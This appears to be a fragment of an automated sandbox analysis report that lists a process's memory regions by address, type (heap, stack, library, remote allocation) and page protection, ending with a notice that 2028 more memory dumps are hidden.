7FFA2CF3F000
unkown
page readonly
1A6B4A13000
heap
page read and write
1C7CF669000
trusted library allocation
page read and write
24D2E484000
heap
page read and write
188AF010000
heap
page read and write
17083016000
heap
page read and write
1708506E000
heap
page read and write
1E2803A2000
heap
page read and write
2672F880000
heap
page read and write
11C8000
heap
page read and write
16006324000
heap
page read and write
1708505A000
heap
page read and write
1FED58F0000
heap
page read and write
1C7BF350000
heap
page execute and read and write
6DD6000
heap
page read and write
24D35D22000
heap
page read and write
17085123000
heap
page read and write
24D2E473000
heap
page read and write
BC0000
heap
page read and write
1E2803E3000
heap
page read and write
660F1000
unkown
page read and write
24D3B481000
heap
page read and write
166D5190000
heap
page read and write
24D2E4D9000
heap
page read and write
1E280424000
heap
page read and write
150FC8F0000
remote allocation
page read and write
1F54F002000
heap
page read and write
17085074000
heap
page read and write
7FFA2CEDD000
unkown
page write copy
17085172000
heap
page read and write
46E94FE000
unkown
page readonly
7FF9C5660000
trusted library allocation
page read and write
24D352E0000
heap
page read and write
1ADD0817000
heap
page read and write
1C7D7369000
heap
page read and write
82959FE000
stack
page read and write
17087761000
heap
page read and write
17085040000
heap
page read and write
7E10000
heap
page read and write
160063AB000
heap
page read and write
17085070000
heap
page read and write
1DEFEA44000
heap
page read and write
1E2803E8000
heap
page read and write
26B9E280000
heap
page read and write
7FF9C5A20000
trusted library allocation
page read and write
150FCA26000
heap
page read and write
24D361F0000
heap
page read and write
82955BD000
stack
page read and write
17085190000
heap
page read and write
24D338D0000
heap
page read and write
24D337D0000
heap
page read and write
7FFA33166000
unkown
page readonly
1FED5B50000
heap
page read and write
1708507E000
heap
page read and write
1A4BECF0000
heap
page read and write
9E2FF7E000
unkown
page readonly
24D2E440000
heap
page read and write
DDE60FF000
stack
page read and write
24D2E4B4000
heap
page read and write
150FB226000
heap
page read and write
There are 2028 hidden memdumps, click here to show them.